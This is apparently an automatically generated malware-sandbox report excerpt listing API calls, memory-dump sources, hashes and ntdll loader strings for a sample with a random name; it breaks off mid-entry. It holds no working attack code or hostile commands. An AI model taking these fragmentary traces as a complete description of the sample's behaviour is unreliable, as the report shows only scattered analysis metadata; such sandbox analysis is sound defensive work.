control_flow_graph 289 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 300 40835c-40836e PostThreadMessageW 289->300 301 40838e-408392 289->301 302 408370-40838a call 40a480 300->302 303 40838d 300->303 302->303 303->301
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: MessagePostThread
• API String ID: 1836367815-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 321 41a7c4-41a7c7 322 41a751-41a774 call 41af60 321->322 323 41a7c9-41a7ea call 41af60 321->323 326 41a7ef-41a804 LookupPrivilegeValueW 323->326
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: LookupPrivilegeValue
• API String ID: 3899507212-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 339 41a670-41a6a1 call 41af60 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: FreeHeap
• API String ID: 3298025750-0
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: LookupPrivilegeValue
• API String ID: 3899507212-0
Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: ExitProcess
• API String ID: 621844428-0
                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: bb1e3cb4bb50ca157ff9c9b24bda18b534e8ec6d60e48b22c7a9885e0afc3def
                                                                                                                    • Instruction ID: 40e5e1a2cab825b24de6f3df1a4257f960e8001e312523f40b897f1bb9f50e05
                                                                                                                    • Opcode Fuzzy Hash: bb1e3cb4bb50ca157ff9c9b24bda18b534e8ec6d60e48b22c7a9885e0afc3def
                                                                                                                    • Instruction Fuzzy Hash: D3B09B719015C5C6DA11F7A45608717790077D0701F16C072E2030641F877CD5D1E275
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-2160512332
                                                                                                                    • Opcode ID: 1d86862e5c03452616bc32c9099d530e7eb5087d8917c34c381d46bc91ff294e
                                                                                                                    • Instruction ID: 06787be2d3308db02c0d47c7801997a220d86f8ab9a2989aa191f79d61c958f6
                                                                                                                    • Opcode Fuzzy Hash: 1d86862e5c03452616bc32c9099d530e7eb5087d8917c34c381d46bc91ff294e
                                                                                                                    • Instruction Fuzzy Hash: AD926B71604342ABE721DF29CC80B6BBBE8BF84754F04492EFA95D7251D770EA44CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A654E2
                                                                                                                    • corrupted critical section, xrefs: 01A654C2
                                                                                                                    • double initialized or corrupted critical section, xrefs: 01A65508
                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01A65543
                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A654CE
                                                                                                                    • Critical section debug info address, xrefs: 01A6541F, 01A6552E
                                                                                                                    • Critical section address., xrefs: 01A65502
                                                                                                                    • Address of the debug info found in the active list., xrefs: 01A654AE, 01A654FA
                                                                                                                    • Thread identifier, xrefs: 01A6553A
                                                                                                                    • undeleted critical section in freed memory, xrefs: 01A6542B
                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A6540A, 01A65496, 01A65519
                                                                                                                    • Critical section address, xrefs: 01A65425, 01A654BC, 01A65534
                                                                                                                    • 8, xrefs: 01A652E3
                                                                                                                    • Invalid debug info address of this critical section, xrefs: 01A654B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                    • API String ID: 0-2368682639
                                                                                                                    • Opcode ID: 293caf71fed718d3dc7b80c90ebf4e5ea614b2ac53eba74d3de0ba6c3e5f1dac
                                                                                                                    • Instruction ID: a1bd3aa17feaf6eacc76df7133097ccd7218e494642866e533afb34e6103a80a
                                                                                                                    • Opcode Fuzzy Hash: 293caf71fed718d3dc7b80c90ebf4e5ea614b2ac53eba74d3de0ba6c3e5f1dac
                                                                                                                    • Instruction Fuzzy Hash: 3A818BB0E40358AFDB20CF99C845FAEBBF9BB88B14F148159F508B7281D775A945CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A62412
                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A62624
                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A62506
                                                                                                                    • @, xrefs: 01A6259B
                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A625EB
                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A62602
                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A6261F
                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A62498
                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A62409
                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A624C0
                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A622E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                    • API String ID: 0-4009184096
                                                                                                                    • Opcode ID: beccc9cf789be0ea867c4484d67417dfe6553a66eea9a5f73713c3322e41dc5a
                                                                                                                    • Instruction ID: aa3523ef5ca7467df8756b2f62dc01ce07b42ecd0d0d74545fa00b12335901e1
                                                                                                                    • Opcode Fuzzy Hash: beccc9cf789be0ea867c4484d67417dfe6553a66eea9a5f73713c3322e41dc5a
                                                                                                                    • Instruction Fuzzy Hash: 9B025EF1D002299FDB31DB58CD84BEAB7B8AB54704F4441EAE609A7241EB309F84CF59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                    • API String ID: 0-2515994595
                                                                                                                    • Opcode ID: 0fe925b781ab3b73a18e44edcd22bda8b88f11bd65f466477b69561022de0efc
                                                                                                                    • Instruction ID: 2914a22df2720a7a124cfdd113bc97f242bdafe42b77ba441758b205d6965715
                                                                                                                    • Opcode Fuzzy Hash: 0fe925b781ab3b73a18e44edcd22bda8b88f11bd65f466477b69561022de0efc
                                                                                                                    • Instruction Fuzzy Hash: 8351E2715043599FCB29CF18C884BABBBE8EFD6644F14091DFA99C3240E778D588CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                    • API String ID: 0-1700792311
                                                                                                                    • Opcode ID: d88fd417eb4d1176e32184b3af9a601dbb01178c4699a3dc12d1cc345705fbdf
                                                                                                                    • Instruction ID: 67c428d648720373be88cc3100429b2f2f8f09b5237d5e5775627cfe38860dc7
                                                                                                                    • Opcode Fuzzy Hash: d88fd417eb4d1176e32184b3af9a601dbb01178c4699a3dc12d1cc345705fbdf
                                                                                                                    • Instruction Fuzzy Hash: FAD1EF35A00786DFDB22DF68C544AADBBF2FF8A714F488059F48A9B252C734E941CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 01A78B8F
                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A78A67
                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A78A3D
                                                                                                                    • VerifierFlags, xrefs: 01A78C50
                                                                                                                    • VerifierDlls, xrefs: 01A78CBD
                                                                                                                    • VerifierDebug, xrefs: 01A78CA5
                                                                                                                    • HandleTraces, xrefs: 01A78C8F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                    • API String ID: 0-3223716464
                                                                                                                    • Opcode ID: 0be6aad6c80a49ee2687728f6179c1556efe4edc282129148b021f1622612818
                                                                                                                    • Instruction ID: 03a665fad9a69e20b165d93d1ac73cd7a0a2fc0460be5730c2a66d90d3f897be
                                                                                                                    • Opcode Fuzzy Hash: 0be6aad6c80a49ee2687728f6179c1556efe4edc282129148b021f1622612818
                                                                                                                    • Instruction Fuzzy Hash: A49148B6A01312AFD721EF28DD88B2B7BE8EB94728F05045CFA456F241C7789E05C795
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                    • API String ID: 0-1109411897
                                                                                                                    • Opcode ID: 269432e2872246c739f6487a5949dbc03b11051afb89816fbb99c519f1d94964
                                                                                                                    • Instruction ID: 3890263dccffddc1c59413cd69227ff2de9054163c3ffb7fd08d475915f897d6
                                                                                                                    • Opcode Fuzzy Hash: 269432e2872246c739f6487a5949dbc03b11051afb89816fbb99c519f1d94964
                                                                                                                    • Instruction Fuzzy Hash: 91A24A75A0962A9FDB64CF18C988BADBBB5BF49304F1442D9D90DA7251EB309EC5CF00
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
• Opcode ID: e4bcddd7b61de647131bc575c91f7c19b2d81b49c150a9aba71d268fa9eda1e2
• Instruction ID: 818fbd7c7fb9a5473eb2d4b2c0211096082d359999b5ca281a14c32bfb7a17cc
• Opcode Fuzzy Hash: e4bcddd7b61de647131bc575c91f7c19b2d81b49c150a9aba71d268fa9eda1e2
• Instruction Fuzzy Hash: 4D916A74F01325DBEB35DF6CEA44BAA7BE5BF58B24F140029E9486B282D7709802C791
Uniqueness

Uniqueness Score: -1.00%

Strings
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A49A01
• minkernel\ntdll\ldrinit.c, xrefs: 01A49A11, 01A49A3A
• apphelp.dll, xrefs: 019E6496
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A499ED
• LdrpInitShimEngine, xrefs: 01A499F4, 01A49A07, 01A49A30
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A49A2A
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
• Opcode ID: a479b24d9840710f639990cdd86a92c4b718208cd9c799f19c30ceb4fbf3276c
• Instruction ID: c5ca4f62bfdc4e4e320e30b678199c5cf4c219b5ed436fb88825c70410f810bc
• Opcode Fuzzy Hash: a479b24d9840710f639990cdd86a92c4b718208cd9c799f19c30ceb4fbf3276c
• Instruction Fuzzy Hash: 8751DE752083019FEB21DF24D945AAB77E8FFD8A48F00492DF5899B290DA30E905CB93
Uniqueness

Uniqueness Score: -1.00%

Strings
• LdrpInitializeImportRedirection, xrefs: 01A68177, 01A681EB
• LdrpInitializeProcess, xrefs: 01A2C6C4
• Unable to build import redirection Table, Status = 0x%x, xrefs: 01A681E5
• minkernel\ntdll\ldrinit.c, xrefs: 01A2C6C3
• Loading import redirection DLL: '%wZ', xrefs: 01A68170
• minkernel\ntdll\ldrredirect.c, xrefs: 01A68181, 01A681F5
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
• Opcode ID: fd03207066a75b1900880335346d283d323a218ca6b14c09f32b281de23448d3
• Instruction ID: f6f03bf64b6a06af9c0be93eeb185de5afcce55edb2e52c009f6a57a0b89b226
• Opcode Fuzzy Hash: fd03207066a75b1900880335346d283d323a218ca6b14c09f32b281de23448d3
• Instruction Fuzzy Hash: A23105B16443169BC224EF6CDE46E2B77E8FFD5B20F04055CF984AB295E620ED05C7A2
Uniqueness

Uniqueness Score: -1.00%

Strings
• SXS: %s() passed the empty activation context, xrefs: 01A62165
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A62180
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A621BF
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A62178
• RtlGetAssemblyStorageRoot, xrefs: 01A62160, 01A6219A, 01A621BA
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A6219F
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
• Opcode ID: 451f8045bc1173bc1af77c02d1fc8bc941b386c0274e46613c4bfb7716f6e41d
• Instruction ID: 80048bdfedd4750c5de82f1ca5c5f2f77e7b3a7b8b4d0566a5f696ed1ff7c674
• Opcode Fuzzy Hash: 451f8045bc1173bc1af77c02d1fc8bc941b386c0274e46613c4bfb7716f6e41d
• Instruction Fuzzy Hash: 7431C736F44335BBE7259B9A8C81F6A7A78DBA5A54F09405AFB08BB140D2709A00C7E1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 01A32DF0: LdrInitializeThunk.NTDLL ref: 01A32DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A30D74
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
• Opcode ID: 827872670f4fc42afdc97de39b4e443ea94240d46a91ab9d65c24bb97aa4436a
• Instruction ID: 2f6cbd83e6ca3313e6b1a93e6944e2d741320661d017177f085afad92bc1d20e
• Opcode Fuzzy Hash: 827872670f4fc42afdc97de39b4e443ea94240d46a91ab9d65c24bb97aa4436a
• Instruction Fuzzy Hash: F1426DB2A00715DFDB21CF28C980BAAB7F5FF44314F1445AAE999DB241D770AA85CF60
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
• Opcode ID: 61d452bac3dddc192107cdf95164a7a81aa468959eee8f1e0a0467aa333f73f3
• Instruction ID: 2ec01657828a33ee4ce5e02d9e8756c8cc1dee8dc3e9deeefb2dad493ab2dcf8
• Opcode Fuzzy Hash: 61d452bac3dddc192107cdf95164a7a81aa468959eee8f1e0a0467aa333f73f3
• Instruction Fuzzy Hash: B0C19C74208386EFD711CF58C544B6AB7E4BF84704F04886EFA9D8B291E734CA49CB52
Uniqueness

Uniqueness Score: -1.00%

Strings
• @, xrefs: 01A28591
• LdrpInitializeProcess, xrefs: 01A28422
• minkernel\ntdll\ldrinit.c, xrefs: 01A28421
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A2855E
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
• Opcode ID: a20094021a3966e593328e1573a847187340e1022ee117cb5aa6fae1719b7283
• Instruction ID: a0391860f32b80daae9df853e86442a87fdc41a5fb5bf875d0f6c38bb2e5305d
• Opcode Fuzzy Hash: a20094021a3966e593328e1573a847187340e1022ee117cb5aa6fae1719b7283
• Instruction Fuzzy Hash: 7D919E71508355AFE721EF69CD40FABBAECBF84784F44092EFA8496151E334D904CB62
Uniqueness

Uniqueness Score: -1.00%

Strings
• SXS: %s() passed the empty activation context, xrefs: 01A621DE
• .Local, xrefs: 01A228D8
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A622B6
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A621D9, 01A622B1
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
• Opcode ID: 469f472434d7345c54eef0a61522e80b8a3f50825bbafb9d7b813cc0c5870502
• Instruction ID: 47390fa4b60f335d0e16867584055570f46454931df6771bc044ec3b9ba632b2
• Opcode Fuzzy Hash: 469f472434d7345c54eef0a61522e80b8a3f50825bbafb9d7b813cc0c5870502
• Instruction Fuzzy Hash: D1A1AF31A0022ADFDB25CF68DC88BA9B7B5BF58354F1541EAD948EB251D7709E80CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A6342A
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A63456
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A63437
• RtlDeactivateActivationContext, xrefs: 01A63425, 01A63432, 01A63451
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
• Opcode ID: 69456b4feeb85d6507f4e2ee408b7664b3e902144cac75cad5c27d6cd03553b0
• Instruction ID: 6967acc1bdd71e6e0c666fc282a016e7549d3d3a3524553c34ace3bb70b342c8
• Opcode Fuzzy Hash: 69456b4feeb85d6507f4e2ee408b7664b3e902144cac75cad5c27d6cd03553b0
• Instruction Fuzzy Hash: D66103366007229FDB22CF1DC845B2AF7E5BF84B51F19852DE9599B281C730E802CB91
Uniqueness

Uniqueness Score: -1.00%

Strings
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A510AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A5106B
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A51028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A50FE5
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
